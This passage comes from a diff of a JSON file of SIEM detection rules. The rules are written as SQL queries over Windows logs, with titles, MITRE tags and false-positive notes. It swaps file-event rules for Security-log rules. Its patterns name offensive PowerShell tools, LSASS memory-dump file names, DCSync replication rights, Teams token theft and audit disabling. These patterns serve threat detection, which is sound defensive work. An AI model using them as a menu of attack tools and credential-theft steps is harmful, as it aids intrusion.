'%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_susp_dsrm_password_change.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Denied Access To Remote Desktop", + "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", + "status": "test", + "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", + "author": "Pushkarev Dmitry", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Valid user was not added to RDP group" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\')" + "attack.lateral_movement", + "attack.t1021.002" ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml" - }, - { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", "tags": [ - "attack.persistence" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Companies, who may use these default LDAP-Attributes for personal information" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\target.exe' ESCAPE '\\' OR NewProcessName LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", - "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", + "attack.discovery", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Unlikely" + "Go utilities that use staaldraad awesome NTLM library" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", - "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", + "status": "experimental", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_spool_drivers_color_drop.yml" + "filename": "win_security_dcsync.yml" }, { - "title": "Publisher Attachment File Dropped In Suspicious Location", - "id": "3d2a2d59-929c-4b78-8c1a-145dfe9e07b1", - "status": "experimental", - "description": "Detects creation of files with the \".pub\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Sessions Network Connections (WinRM)", + "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "status": "test", + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of \".pub\" files from those locations" + "Legitimate use of remote PowerShell execution" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.pub' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" ], - "filename": "file_event_win_office_publisher_files_in_susp_locations.yml" + "filename": "win_security_remote_powershell_session.yml" }, { - "title": "ScreenConnect Temporary Installation Artefact", - "id": "fec96f39-988b-4586-b746-b93d59fd1922", + "title": "Defrag Deactivation - Security", + "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1053", + "attack.s0111" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Bin\\\\ScreenConnect.%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" ], - "filename": "file_event_win_screenconnect_artefact.yml" + "filename": "win_security_apt_slingshot.yml" }, { - "title": "LSASS Process Memory Dump Files", - "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "title": "Invoke-Obfuscation STDIN+ Launcher - Security", + "id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "status": "experimental", - "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\' AND (ServiceFileName LIKE '%${input}%' ESCAPE '\\' OR ServiceFileName LIKE '%noexit%' ESCAPE '\\') AND (ServiceFileName LIKE '% /c %' ESCAPE '\\' OR ServiceFileName LIKE '% /r %' ESCAPE '\\'))" ], - "filename": "file_event_win_lsass_dump.yml" + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml" }, { - "title": "Potential Initial Access via DLL Search Order Hijacking", - "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "title": "Suspicious Teams Application Related ObjectAcess Event", + "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", "status": "experimental", - "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", - "author": "Tim Rauch (rule), Elastic (idea)", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1574", - "attack.t1574.001", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" + "filename": "win_security_teams_suspicious_objectaccess.yml" }, { - "title": "Suspicious desktop.ini Action", - "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", "status": "test", - "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "author": "Orlinum , BlueDefenZer", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Operations performed through Windows SCCM or equivalent", - "Read only access list authority" + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 